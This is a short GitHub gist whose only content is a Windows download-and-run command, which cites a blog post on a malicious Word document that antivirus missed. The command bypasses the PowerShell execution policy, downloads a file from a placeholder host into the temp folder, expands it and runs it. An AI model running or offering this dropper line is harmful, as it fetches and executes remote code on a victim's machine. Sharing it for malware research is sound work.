jonaslejon/gist:18c5d308e5f7d526a708

Created April 8, 2015 12:26

Star (0) You must be signed in to star a gist
Fork (0) You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/jonaslejon/18c5d308e5f7d526a708.js"></script>
Save jonaslejon/18c5d308e5f7d526a708 to your computer and use it in GitHub Desktop.

Download ZIP

Download and run file

Raw

gistfile1.txt

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('https://x.x.x.x/file.exe','%TEMP%\\31231231.cab'); expand %TEMP%\31231231.cab %TEMP%\31231231.exe; start %TEMP%\31231231.exe;

Author

jonaslejon commented Apr 8, 2015

Source: http://blog.rootshell.be/2015/04/07/malicious-ms-word-document-not-detected-by-av-software/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment